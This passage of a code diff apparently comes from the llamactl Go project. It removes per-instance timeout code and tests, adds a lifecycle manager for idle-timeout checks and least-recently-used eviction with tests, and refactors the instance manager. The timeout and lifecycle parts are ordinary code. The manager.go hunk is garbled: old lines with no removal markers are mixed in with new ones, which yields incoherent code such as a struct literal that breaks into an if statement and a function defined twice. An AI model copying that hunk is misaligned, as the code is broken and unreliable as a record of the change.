 // Status while holding the write lock.
 func (st *status) UnmarshalJSON(data []byte) error {
 	st.mu.Lock()
 	defer st.mu.Unlock()
 	target := &st.s
 	return target.UnmarshalJSON(data)
 }
--- a/pkg/instance/timeout.go
+++ b/pkg/instance/timeout.go
@@ -1,28 +0,0 @@
 package instance
 // UpdateLastRequestTime stores the time provider's current time (Unix
 // seconds) as the instance's last request time, holding the instance lock.
 func (i *Process) UpdateLastRequestTime() {
 	i.mu.Lock()
 	defer i.mu.Unlock()
 	i.lastRequestTime.Store(i.timeProvider.Now().Unix())
 }
 // ShouldTimeout reports whether a running instance has been idle for longer
 // than its IdleTimeout (minutes). It is false when the instance is not
 // running or no positive IdleTimeout is configured.
 func (i *Process) ShouldTimeout() bool {
 	i.mu.RLock()
 	defer i.mu.RUnlock()
 	if !i.IsRunning() {
 		return false
 	}
 	if i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
 		return false
 	}
 	lastRequest := i.lastRequestTime.Load()
 	// IdleTimeout is in minutes, timestamps are in seconds
 	limitSeconds := int64(*i.options.IdleTimeout * 60)
 	idleSeconds := i.timeProvider.Now().Unix() - lastRequest
 	return idleSeconds > limitSeconds
 }
--- a/pkg/instance/timeout_test.go
+++ b/pkg/instance/timeout_test.go
@@ -1,250 +0,0 @@
 package instance_test
 import (
 	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/testutil"
 	"sync/atomic"
 	"testing"
 	"time"
 )
 // MockTimeProvider implements TimeProvider for testing
 type MockTimeProvider struct {
 	currentTime atomic.Int64 // Unix timestamp
 }
 func NewMockTimeProvider(t time.Time) *MockTimeProvider {
 	m := &MockTimeProvider{}
 	m.currentTime.Store(t.Unix())
 	return m
 }
 func (m *MockTimeProvider) Now() time.Time {
 	return time.Unix(m.currentTime.Load(), 0)
 }
 func (m *MockTimeProvider) SetTime(t time.Time) {
 	m.currentTime.Store(t.Unix())
 }
 // Timeout-related tests
 // TestUpdateLastRequestTime is a smoke test: calling UpdateLastRequestTime
 // on a freshly created instance must not panic.
 func TestUpdateLastRequestTime(t *testing.T) {
 	backendCfg := &config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	instancesCfg := &config.InstancesConfig{LogsDir: "/tmp/test"}
 	llamaOpts := &llamacpp.LlamaServerOptions{Model: "/path/to/model.gguf"}
 	opts := &instance.CreateInstanceOptions{
 		BackendType:        backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: llamaOpts,
 	}
 	// Status changes are irrelevant for this test
 	noopStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
 	subject := instance.NewInstance("test-instance", backendCfg, instancesCfg, opts, noopStatusChange)
 	subject.UpdateLastRequestTime()
 }
 // TestShouldTimeout_NotRunning checks that an instance that was never
 // started does not report a timeout even with an idle timeout configured.
 func TestShouldTimeout_NotRunning(t *testing.T) {
 	backendCfg := &config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	instancesCfg := &config.InstancesConfig{LogsDir: "/tmp/test"}
 	oneMinute := 1 // 1 minute
 	opts := &instance.CreateInstanceOptions{
 		IdleTimeout:        &oneMinute,
 		BackendType:        backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{Model: "/path/to/model.gguf"},
 	}
 	// Status changes are irrelevant for this test
 	noopStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
 	subject := instance.NewInstance("test-instance", backendCfg, instancesCfg, opts, noopStatusChange)
 	// Not running, so the configured timeout must be ignored
 	if timedOut := subject.ShouldTimeout(); timedOut {
 		t.Error("Non-running instance should never timeout")
 	}
 }
 // TestShouldTimeout_NoTimeoutConfigured checks that a running instance with
 // a nil, zero or negative idle timeout never reports a timeout.
 func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
 	backendCfg := &config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	instancesCfg := &config.InstancesConfig{LogsDir: "/tmp/test"}
 	type testCase struct {
 		name        string
 		idleTimeout *int
 	}
 	cases := []testCase{
 		{name: "nil timeout", idleTimeout: nil},
 		{name: "zero timeout", idleTimeout: testutil.IntPtr(0)},
 		{name: "negative timeout", idleTimeout: testutil.IntPtr(-5)},
 	}
 	for _, tc := range cases {
 		t.Run(tc.name, func(t *testing.T) {
 			// Status changes are irrelevant for this test
 			noopStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
 			opts := &instance.CreateInstanceOptions{
 				IdleTimeout:        tc.idleTimeout,
 				BackendType:        backends.BackendTypeLlamaCpp,
 				LlamaServerOptions: &llamacpp.LlamaServerOptions{Model: "/path/to/model.gguf"},
 			}
 			subject := instance.NewInstance("test-instance", backendCfg, instancesCfg, opts, noopStatusChange)
 			// Pretend the instance is running so only the timeout setting matters
 			subject.SetStatus(instance.Running)
 			if timedOut := subject.ShouldTimeout(); timedOut {
 				t.Errorf("Instance with %s should not timeout", tc.name)
 			}
 		})
 	}
 }
 // TestShouldTimeout_WithinTimeLimit checks that a running instance whose
 // last request was just recorded does not report a timeout.
 func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
 	backendCfg := &config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	instancesCfg := &config.InstancesConfig{LogsDir: "/tmp/test"}
 	fiveMinutes := 5 // 5 minutes
 	opts := &instance.CreateInstanceOptions{
 		IdleTimeout:        &fiveMinutes,
 		BackendType:        backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{Model: "/path/to/model.gguf"},
 	}
 	// Status changes are irrelevant for this test
 	noopStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
 	subject := instance.NewInstance("test-instance", backendCfg, instancesCfg, opts, noopStatusChange)
 	subject.SetStatus(instance.Running)
 	// A request "just happened"
 	subject.UpdateLastRequestTime()
 	if timedOut := subject.ShouldTimeout(); timedOut {
 		t.Error("Instance should not timeout when last request was recent")
 	}
 }
 // TestShouldTimeout_ExceedsTimeLimit checks that a running instance reports
 // a timeout once the mock clock has advanced past its idle timeout.
 func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
 	backendCfg := &config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	instancesCfg := &config.InstancesConfig{LogsDir: "/tmp/test"}
 	oneMinute := 1 // 1 minute
 	opts := &instance.CreateInstanceOptions{
 		IdleTimeout:        &oneMinute,
 		BackendType:        backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{Model: "/path/to/model.gguf"},
 	}
 	// Status changes are irrelevant for this test
 	noopStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
 	subject := instance.NewInstance("test-instance", backendCfg, instancesCfg, opts, noopStatusChange)
 	subject.SetStatus(instance.Running)
 	// Drive the instance from a controllable clock
 	clock := NewMockTimeProvider(time.Now())
 	subject.SetTimeProvider(clock)
 	// Last request happens "now" ...
 	subject.UpdateLastRequestTime()
 	// ... and then two minutes pass, exceeding the one minute timeout
 	clock.SetTime(time.Now().Add(2 * time.Minute))
 	if timedOut := subject.ShouldTimeout(); !timedOut {
 		t.Error("Instance should timeout when last request exceeds idle timeout")
 	}
 }
 // TestTimeoutConfiguration_Validation checks the IdleTimeout value an
 // instance ends up with after creation: nil and negative inputs are
 // expected to become 0, other values are expected to be kept.
 func TestTimeoutConfiguration_Validation(t *testing.T) {
 	backendCfg := &config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	instancesCfg := &config.InstancesConfig{LogsDir: "/tmp/test"}
 	type testCase struct {
 		name            string
 		inputTimeout    *int
 		expectedTimeout int
 	}
 	cases := []testCase{
 		{name: "default value when nil", inputTimeout: nil, expectedTimeout: 0},
 		{name: "positive value", inputTimeout: testutil.IntPtr(10), expectedTimeout: 10},
 		{name: "zero value", inputTimeout: testutil.IntPtr(0), expectedTimeout: 0},
 		{name: "negative value gets corrected", inputTimeout: testutil.IntPtr(-5), expectedTimeout: 0},
 	}
 	for _, tc := range cases {
 		t.Run(tc.name, func(t *testing.T) {
 			requested := &instance.CreateInstanceOptions{
 				IdleTimeout:        tc.inputTimeout,
 				BackendType:        backends.BackendTypeLlamaCpp,
 				LlamaServerOptions: &llamacpp.LlamaServerOptions{Model: "/path/to/model.gguf"},
 			}
 			// Status changes are irrelevant for this test
 			noopStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
 			subject := instance.NewInstance("test-instance", backendCfg, instancesCfg, requested, noopStatusChange)
 			effective := subject.GetOptions()
 			if effective.IdleTimeout == nil || *effective.IdleTimeout != tc.expectedTimeout {
 				t.Errorf("Expected IdleTimeout %d, got %v", tc.expectedTimeout, effective.IdleTimeout)
 			}
 		})
 	}
 }
--- a/pkg/manager/lifecycle.go
+++ b/pkg/manager/lifecycle.go
@@ -0,0 +1,152 @@
 package manager
 import (
 	"fmt"
 	"llamactl/pkg/instance"
 	"log"
 	"sync"
 	"time"
 )
 // lifecycleManager handles background timeout checking and LRU eviction.
 // It properly coordinates shutdown to prevent races with the timeout checker.
 type lifecycleManager struct {
 	// registry is the source of the instances that are checked or evicted.
 	registry *instanceRegistry
 	manager  InstanceManager // For calling Stop/Evict operations
 	// ticker fires every checkInterval and drives the timeout check loop.
 	ticker        *time.Ticker
 	checkInterval time.Duration
 	// enableLRU gates evictLRU.
 	enableLRU     bool
 	// shutdownChan is closed by stop to request shutdown;
 	// shutdownDone is closed by the check loop when it has exited.
 	shutdownChan chan struct{}
 	shutdownDone chan struct{}
 	// shutdownOnce makes stop safe to call more than once.
 	shutdownOnce sync.Once
 }
 // newLifecycleManager creates a lifecycle manager whose ticker fires every
 // checkInterval. A non-positive checkInterval is replaced by 5 minutes. The
 // check loop is not running until start is called.
 func newLifecycleManager(
 	registry *instanceRegistry,
 	manager InstanceManager,
 	checkInterval time.Duration,
 	enableLRU bool,
 ) *lifecycleManager {
 	interval := checkInterval
 	if interval <= 0 {
 		interval = 5 * time.Minute // Default to 5 minutes
 	}
 	lm := new(lifecycleManager)
 	lm.registry = registry
 	lm.manager = manager
 	lm.ticker = time.NewTicker(interval)
 	lm.checkInterval = interval
 	lm.enableLRU = enableLRU
 	lm.shutdownChan = make(chan struct{})
 	lm.shutdownDone = make(chan struct{})
 	return lm
 }
 // start begins the timeout checking loop in a goroutine.
 // NOTE(review): stop waits for this loop to exit, so it presumably must only be called after start — confirm.
 func (l *lifecycleManager) start() {
 	go l.timeoutCheckLoop()
 }
 // stop gracefully stops the lifecycle manager.
 // It closes shutdownChan, waits for the check loop to close shutdownDone and
 // then stops the ticker. This ensures the timeout checker completes before
 // instance cleanup begins. Repeated calls are no-ops thanks to shutdownOnce.
 func (l *lifecycleManager) stop() {
 	l.shutdownOnce.Do(func() {
 		close(l.shutdownChan)
 		<-l.shutdownDone // Wait for checker to finish (prevents shutdown race)
 		l.ticker.Stop()
 	})
 }
 // timeoutCheckLoop runs checkTimeouts on every ticker tick until
 // shutdownChan is closed. It closes shutdownDone on exit so stop can wait
 // for it.
 func (l *lifecycleManager) timeoutCheckLoop() {
 	defer close(l.shutdownDone) // Signal completion
 	for {
 		select {
 		case <-l.shutdownChan:
 			// Shutdown requested, leave the goroutine
 			return
 		case <-l.ticker.C:
 			l.checkTimeouts()
 		}
 	}
 }
 // checkTimeouts stops every local, running instance that reports
 // ShouldTimeout. Candidates are collected first and stopped afterwards
 // through the manager; the outcome of each stop is logged.
 func (l *lifecycleManager) checkTimeouts() {
 	var expired []string
 	for _, inst := range l.registry.list() {
 		// Remote instances are managed by their respective nodes; only
 		// running instances can time out
 		if inst.IsRemote() || !l.registry.isRunning(inst.Name) || !inst.ShouldTimeout() {
 			continue
 		}
 		expired = append(expired, inst.Name)
 	}
 	for _, name := range expired {
 		log.Printf("Instance %s has timed out, stopping it", name)
 		_, stopErr := l.manager.StopInstance(name)
 		if stopErr == nil {
 			log.Printf("Instance %s stopped successfully", name)
 			continue
 		}
 		log.Printf("Error stopping instance %s: %v", name, stopErr)
 	}
 }
 // evictLRU stops the running local instance with the oldest last request
 // time. Remote instances and instances whose IdleTimeout is explicitly set
 // to a non-positive value are never evicted. It returns an error when LRU
 // eviction is disabled, when no candidate exists, or when stopping the
 // chosen instance fails.
 func (l *lifecycleManager) evictLRU() error {
 	if !l.enableLRU {
 		return fmt.Errorf("LRU eviction is not enabled")
 	}
 	var lruInstance *instance.Instance
 	for _, candidate := range l.registry.listRunning() {
 		// Remote instances are managed by their respective nodes
 		if candidate.IsRemote() {
 			continue
 		}
 		// An explicit non-positive idle timeout exempts the instance from eviction
 		if opts := candidate.GetOptions(); opts != nil && opts.IdleTimeout != nil && *opts.IdleTimeout <= 0 {
 			continue
 		}
 		if lruInstance == nil || candidate.LastRequestTime() < lruInstance.LastRequestTime() {
 			lruInstance = candidate
 		}
 	}
 	if lruInstance == nil {
 		return fmt.Errorf("failed to find lru instance")
 	}
 	log.Printf("Evicting LRU instance %s", lruInstance.Name)
 	_, stopErr := l.manager.StopInstance(lruInstance.Name)
 	return stopErr
 }
--- a/pkg/manager/lifecycle_test.go
+++ b/pkg/manager/lifecycle_test.go
@@ -0,0 +1,220 @@
 package manager_test
 import (
 	"llamactl/pkg/backends"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/manager"
 	"sync"
 	"testing"
 	"time"
 )
 // TestInstanceTimeoutLogic checks that a running instance with a 1-minute idle
 // timeout does not report a timeout right after a request, and does report one
 // once the injected clock has moved past the idle period.
 func TestInstanceTimeoutLogic(t *testing.T) {
 	testManager := createTestManager()
 	defer testManager.Shutdown()
 	idleTimeout := 1 // 1 minute
 	inst := createInstanceWithTimeout(t, testManager, "timeout-test", "/path/to/model.gguf", &idleTimeout)
 	// Drive the instance from a mock clock so the test controls elapsed time
 	mockTime := NewMockTimeProvider(time.Now())
 	inst.SetTimeProvider(mockTime)
 	// Set instance to running state so timeout logic can work
 	inst.SetStatus(instance.Running)
 	defer inst.SetStatus(instance.Stopped)
 	// Update last request time
 	inst.UpdateLastRequestTime()
 	// Initially should not timeout (just updated)
 	if inst.ShouldTimeout() {
 		t.Error("Instance should not timeout immediately after request")
 	}
 	// Advance the mock clock relative to its own reading rather than the wall
 	// clock, so the elapsed idle time is exactly two minutes
 	mockTime.SetTime(mockTime.Now().Add(2 * time.Minute))
 	// Now it should timeout
 	if !inst.ShouldTimeout() {
 		t.Error("Instance should timeout after idle period")
 	}
 }
 // TestInstanceWithoutTimeoutNeverExpires checks that an instance created with
 // a nil idle timeout does not report a timeout even after the mock clock has
 // been advanced by a full day.
 func TestInstanceWithoutTimeoutNeverExpires(t *testing.T) {
 	mgr := createTestManager()
 	defer mgr.Shutdown()
 	inst := createInstanceWithTimeout(t, mgr, "no-timeout-test", "/path/to/model.gguf", nil)
 	clock := NewMockTimeProvider(time.Now())
 	inst.SetTimeProvider(clock)
 	inst.SetStatus(instance.Running)
 	defer inst.SetStatus(instance.Stopped)
 	inst.UpdateLastRequestTime()
 	// Move the clock far beyond any plausible idle period
 	oneDayLater := clock.Now().Add(24 * time.Hour)
 	clock.SetTime(oneDayLater)
 	// Without a timeout configured the instance must stay alive
 	if expired := inst.ShouldTimeout(); expired {
 		t.Error("Instance without timeout configuration should never timeout")
 	}
 }
 // TestEvictLRUInstance_Success creates three running instances whose last
 // request times are one minute apart and checks that EvictLRUInstance stops
 // the oldest one while leaving the other two running.
 func TestEvictLRUInstance_Success(t *testing.T) {
 	mgr := createTestManager()
 	defer mgr.Shutdown()
 	// Idle timeout is enabled on all three (value doesn't matter for LRU logic)
 	validTimeout := 1
 	inst1 := createInstanceWithTimeout(t, mgr, "instance-1", "/path/to/model1.gguf", &validTimeout)
 	inst2 := createInstanceWithTimeout(t, mgr, "instance-2", "/path/to/model2.gguf", &validTimeout)
 	inst3 := createInstanceWithTimeout(t, mgr, "instance-3", "/path/to/model3.gguf", &validTimeout)
 	all := []*instance.Instance{inst1, inst2, inst3}
 	// Share one mock clock between the instances, then mark them running
 	clock := NewMockTimeProvider(time.Now())
 	for _, inst := range all {
 		inst.SetTimeProvider(clock)
 	}
 	for _, inst := range all {
 		inst.SetStatus(instance.Running)
 	}
 	defer func() {
 		// Clean up - ensure all instances are stopped
 		for _, inst := range all {
 			if inst.IsRunning() {
 				inst.SetStatus(instance.Stopped)
 			}
 		}
 	}()
 	// Record last request times oldest to newest, one minute apart:
 	// inst1 is the oldest and therefore the expected eviction victim
 	for i, inst := range all {
 		if i > 0 {
 			clock.SetTime(clock.Now().Add(1 * time.Minute))
 		}
 		inst.UpdateLastRequestTime()
 	}
 	// Evict LRU instance (should be inst1)
 	err := mgr.EvictLRUInstance()
 	if err != nil {
 		t.Fatalf("EvictLRUInstance failed: %v", err)
 	}
 	// The oldest instance must be stopped
 	if inst1.IsRunning() {
 		t.Error("Expected instance-1 to be stopped after eviction")
 	}
 	// The two newer instances must be untouched
 	if !inst2.IsRunning() {
 		t.Error("Expected instance-2 to still be running")
 	}
 	if !inst3.IsRunning() {
 		t.Error("Expected instance-3 to still be running")
 	}
 }
 // TestEvictLRUInstance_NoRunningInstances checks that EvictLRUInstance returns
 // the "failed to find lru instance" error when the manager has no instances.
 func TestEvictLRUInstance_NoRunningInstances(t *testing.T) {
 	manager := createTestManager()
 	defer manager.Shutdown()
 	err := manager.EvictLRUInstance()
 	if err == nil {
 		// Fatal, not Error: continuing would call err.Error() on a nil error
 		// and panic instead of reporting a clean test failure
 		t.Fatal("Expected error when no running instances exist")
 	}
 	if err.Error() != "failed to find lru instance" {
 		t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
 	}
 }
 // TestEvictLRUInstance_OnlyEvictsTimeoutEnabledInstances runs one instance with
 // a positive idle timeout next to one with a zero timeout and one created with
 // a nil timeout, and checks that eviction stops only the first.
 func TestEvictLRUInstance_OnlyEvictsTimeoutEnabledInstances(t *testing.T) {
 	mgr := createTestManager()
 	defer mgr.Shutdown()
 	// Mix of instances: only the timeout-enabled one should be eligible for eviction
 	validTimeout, zeroTimeout := 1, 0
 	instWithTimeout := createInstanceWithTimeout(t, mgr, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
 	instNoTimeout1 := createInstanceWithTimeout(t, mgr, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
 	instNoTimeout2 := createInstanceWithTimeout(t, mgr, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)
 	// Mark every instance as running with a fresh last request time
 	all := []*instance.Instance{instWithTimeout, instNoTimeout1, instNoTimeout2}
 	for _, inst := range all {
 		inst.SetStatus(instance.Running)
 		inst.UpdateLastRequestTime()
 	}
 	defer func() {
 		// Reset instances to stopped to avoid shutdown panics
 		for _, inst := range all {
 			if inst.IsRunning() {
 				inst.SetStatus(instance.Stopped)
 			}
 		}
 	}()
 	// Evict LRU instance - should only consider the one with timeout
 	if err := mgr.EvictLRUInstance(); err != nil {
 		t.Fatalf("EvictLRUInstance failed: %v", err)
 	}
 	// Expected running state of each instance after the eviction
 	expectations := []struct {
 		inst        *instance.Instance
 		wantRunning bool
 		failure     string
 	}{
 		{instWithTimeout, false, "Expected with-timeout instance to be stopped after eviction"},
 		{instNoTimeout1, true, "Expected no-timeout-1 instance to still be running"},
 		{instNoTimeout2, true, "Expected no-timeout-2 instance to still be running"},
 	}
 	for _, want := range expectations {
 		if want.inst.IsRunning() != want.wantRunning {
 			t.Error(want.failure)
 		}
 	}
 }
 // createInstanceWithTimeout is a test helper that creates a llama.cpp-backed
 // instance named name for the given model path, with IdleTimeout set to
 // timeout (which may be nil). The test is aborted if creation fails.
 func createInstanceWithTimeout(t *testing.T, manager manager.InstanceManager, name, model string, timeout *int) *instance.Instance {
 	t.Helper()
 	backendOpts := backends.Options{
 		BackendType:        backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &backends.LlamaServerOptions{Model: model},
 	}
 	created, err := manager.CreateInstance(name, &instance.Options{
 		IdleTimeout:    timeout,
 		BackendOptions: backendOpts,
 	})
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	return created
 }
 // Helper for timeout tests
 type MockTimeProvider struct {
 	currentTime time.Time
 	mu          sync.RWMutex
 }
 func NewMockTimeProvider(t time.Time) *MockTimeProvider {
 	return &MockTimeProvider{currentTime: t}
 }
 func (m *MockTimeProvider) Now() time.Time {
 	m.mu.RLock()
 	defer m.mu.RUnlock()
 	return m.currentTime
 }
 func (m *MockTimeProvider) SetTime(t time.Time) {
 	m.mu.Lock()
 	defer m.mu.Unlock()
 	m.currentTime = t
 }
--- a/pkg/manager/manager.go
+++ b/pkg/manager/manager.go
@@ -1,298 +1,303 @@
 package manager
 import (
-	"encoding/json"
+	"context"
 	"fmt"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"log"
 	"os"
 	"path/filepath"
 	"strings"
 	"sync"
 	"time"
 )
 // InstanceManager defines the interface for managing instances of the llama server.
 type InstanceManager interface {
-	ListInstances() ([]*instance.Process, error)
+	ListInstances() ([]*instance.Instance, error)
-	CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
+	CreateInstance(name string, options *instance.Options) (*instance.Instance, error)
-	GetInstance(name string) (*instance.Process, error)
+	GetInstance(name string) (*instance.Instance, error)
-	UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
+	UpdateInstance(name string, options *instance.Options) (*instance.Instance, error)
 	DeleteInstance(name string) error
-	StartInstance(name string) (*instance.Process, error)
+	StartInstance(name string) (*instance.Instance, error)
 	IsMaxRunningInstancesReached() bool
-	StopInstance(name string) (*instance.Process, error)
+	StopInstance(name string) (*instance.Instance, error)
 	EvictLRUInstance() error
-	RestartInstance(name string) (*instance.Process, error)
+	RestartInstance(name string) (*instance.Instance, error)
-	GetInstanceLogs(name string) (string, error)
+	GetInstanceLogs(name string, numLines int) (string, error)
 	Shutdown()
 }
 type instanceManager struct {
-	mu               sync.RWMutex
+	// Components (each with own synchronization)
-	instances        map[string]*instance.Process
+	registry    *instanceRegistry
-	runningInstances map[string]struct{}
+	ports       *portAllocator
-	ports            map[int]bool
+	persistence *instancePersister
-	instancesConfig  config.InstancesConfig
+	remote      *remoteManager
-	backendsConfig   config.BackendConfig
+	lifecycle   *lifecycleManager
-	// Timeout checker
+	// Configuration
-	timeoutChecker *time.Ticker
+	globalConfig *config.AppConfig
-	shutdownChan   chan struct{}
+
-	shutdownDone   chan struct{}
+	// Synchronization
-	isShutdown     bool
+	instanceLocks sync.Map // map[string]*sync.Mutex - per-instance locks for concurrent operations
 	shutdownOnce  sync.Once
 }
-// NewInstanceManager creates a new instance of InstanceManager.
+// New creates a new instance of InstanceManager.
-func NewInstanceManager(backendsConfig config.BackendConfig, instancesConfig config.InstancesConfig) InstanceManager {
+func New(globalConfig *config.AppConfig) InstanceManager {
 	if instancesConfig.TimeoutCheckInterval <= 0 {
 		instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
 	}
 	im := &instanceManager{
 		instances:        make(map[string]*instance.Process),
 		runningInstances: make(map[string]struct{}),
 		ports:            make(map[int]bool),
 		instancesConfig:  instancesConfig,
 		backendsConfig:   backendsConfig,
-		timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute),
+	if globalConfig.Instances.TimeoutCheckInterval <= 0 {
-		shutdownChan:   make(chan struct{}),
+		globalConfig.Instances.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
 		shutdownDone:   make(chan struct{}),
 	}
 	// Initialize components
 	registry := newInstanceRegistry()
 	// Initialize port allocator
 	portRange := globalConfig.Instances.PortRange
 	ports, err := newPortAllocator(portRange[0], portRange[1])
 	if err != nil {
 		log.Fatalf("Failed to create port allocator: %v", err)
 	}
 	// Initialize persistence
 	persistence, err := newInstancePersister(globalConfig.Instances.InstancesDir)
 	if err != nil {
 		log.Fatalf("Failed to create instance persister: %v", err)
 	}
 	// Initialize remote manager
 	remote := newRemoteManager(globalConfig.Nodes, 30*time.Second)
 	// Create manager instance
 	im := &instanceManager{
 		registry:     registry,
 		ports:        ports,
 		persistence:  persistence,
 		remote:       remote,
 		globalConfig: globalConfig,
 	}
 	// Initialize lifecycle manager (needs reference to manager for Stop/Evict operations)
 	checkInterval := time.Duration(globalConfig.Instances.TimeoutCheckInterval) * time.Minute
 	im.lifecycle = newLifecycleManager(registry, im, checkInterval, true)
 	// Load existing instances from disk
 	if err := im.loadInstances(); err != nil {
 		log.Printf("Error loading instances: %v", err)
 	}
-	// Start the timeout checker goroutine after initialization is complete
+	// Start the lifecycle manager
-	go func() {
+	im.lifecycle.start()
 		defer close(im.shutdownDone)
 		for {
 			select {
 			case <-im.timeoutChecker.C:
 				im.checkAllTimeouts()
 			case <-im.shutdownChan:
 				return // Exit goroutine on shutdown
 			}
 		}
 	}()
 	return im
 }
-func (im *instanceManager) getNextAvailablePort() (int, error) {
+// persistInstance saves an instance using the persistence component
-	portRange := im.instancesConfig.PortRange
+func (im *instanceManager) persistInstance(inst *instance.Instance) error {
-
+	return im.persistence.save(inst)
 	for port := portRange[0]; port <= portRange[1]; port++ {
 		if !im.ports[port] {
 			im.ports[port] = true
 			return port, nil
 		}
 	}
 	return 0, fmt.Errorf("no available ports in the specified range")
 }
 // persistInstance saves an instance to its JSON file
 func (im *instanceManager) persistInstance(instance *instance.Process) error {
 	if im.instancesConfig.InstancesDir == "" {
 		return nil // Persistence disabled
 	}
 	instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
 	tempPath := instancePath + ".tmp"
 	// Serialize instance to JSON
 	jsonData, err := json.MarshalIndent(instance, "", "  ")
 	if err != nil {
 		return fmt.Errorf("failed to marshal instance %s: %w", instance.Name, err)
 	}
 	// Write to temporary file first
 	if err := os.WriteFile(tempPath, jsonData, 0644); err != nil {
 		return fmt.Errorf("failed to write temp file for instance %s: %w", instance.Name, err)
 	}
 	// Atomic rename
 	if err := os.Rename(tempPath, instancePath); err != nil {
 		os.Remove(tempPath) // Clean up temp file
 		return fmt.Errorf("failed to rename temp file for instance %s: %w", instance.Name, err)
 	}
 	return nil
 }
 func (im *instanceManager) Shutdown() {
-	im.mu.Lock()
+	im.shutdownOnce.Do(func() {
 		// 1. Stop lifecycle manager (stops timeout checker)
 		im.lifecycle.stop()
-	// Check if already shutdown
+		// 2. Get running instances (no lock needed - registry handles it)
-	if im.isShutdown {
+		running := im.registry.listRunning()
 		im.mu.Unlock()
 		return
 	}
 	im.isShutdown = true
-	// Signal the timeout checker to stop
+		// 3. Stop local instances concurrently
-	close(im.shutdownChan)
+		var wg sync.WaitGroup
-
+		for _, inst := range running {
-	// Create a list of running instances to stop
+			if inst.IsRemote() {
-	var runningInstances []*instance.Process
+				continue // Skip remote instances
 	var runningNames []string
 	for name, inst := range im.instances {
 		if inst.IsRunning() {
 			runningInstances = append(runningInstances, inst)
 			runningNames = append(runningNames, name)
 		}
 	}
 	// Release lock before stopping instances to avoid deadlock
 	im.mu.Unlock()
 	// Wait for the timeout checker goroutine to actually stop
 	<-im.shutdownDone
 	// Now stop the ticker
 	if im.timeoutChecker != nil {
 		im.timeoutChecker.Stop()
 	}
 	// Stop instances without holding the manager lock
 	var wg sync.WaitGroup
 	wg.Add(len(runningInstances))
 	for i, inst := range runningInstances {
 		go func(name string, inst *instance.Process) {
 			defer wg.Done()
 			fmt.Printf("Stopping instance %s...\n", name)
 			// Attempt to stop the instance gracefully
 			if err := inst.Stop(); err != nil {
 				fmt.Printf("Error stopping instance %s: %v\n", name, err)
 			}
-		}(runningNames[i], inst)
+			wg.Add(1)
-	}
+			go func(inst *instance.Instance) {
-
+				defer wg.Done()
-	wg.Wait()
+				fmt.Printf("Stopping instance %s...\n", inst.Name)
-	fmt.Println("All instances stopped.")
+				if err := inst.Stop(); err != nil {
 					fmt.Printf("Error stopping instance %s: %v\n", inst.Name, err)
 				}
 			}(inst)
 		}
 		wg.Wait()
 		fmt.Println("All instances stopped.")
 	})
 }
-// loadInstances restores all instances from disk
+// loadInstances restores all instances from disk using the persistence component
 func (im *instanceManager) loadInstances() error {
-	if im.instancesConfig.InstancesDir == "" {
+	// Load all instances from persistence
-		return nil // Persistence disabled
+	instances, err := im.persistence.loadAll()
 	}
 	// Check if instances directory exists
 	if _, err := os.Stat(im.instancesConfig.InstancesDir); os.IsNotExist(err) {
 		return nil // No instances directory, start fresh
 	}
 	// Read all JSON files from instances directory
 	files, err := os.ReadDir(im.instancesConfig.InstancesDir)
 	if err != nil {
-		return fmt.Errorf("failed to read instances directory: %w", err)
+		return fmt.Errorf("failed to load instances: %w", err)
 	}
-	loadedCount := 0
+	if len(instances) == 0 {
-	for _, file := range files {
+		return nil
-		if file.IsDir() || !strings.HasSuffix(file.Name(), ".json") {
+	}
 	// Process each loaded instance
 	for _, persistedInst := range instances {
 		if err := im.loadInstance(persistedInst); err != nil {
 			log.Printf("Failed to load instance %s: %v", persistedInst.Name, err)
 			continue
 		}
 		instanceName := strings.TrimSuffix(file.Name(), ".json")
 		instancePath := filepath.Join(im.instancesConfig.InstancesDir, file.Name())
 		if err := im.loadInstance(instanceName, instancePath); err != nil {
 			log.Printf("Failed to load instance %s: %v", instanceName, err)
 			continue
 		}
 		loadedCount++
 	}
-	if loadedCount > 0 {
+	log.Printf("Loaded %d instances from persistence", len(instances))
-		log.Printf("Loaded %d instances from persistence", loadedCount)
+
-		// Auto-start instances that have auto-restart enabled
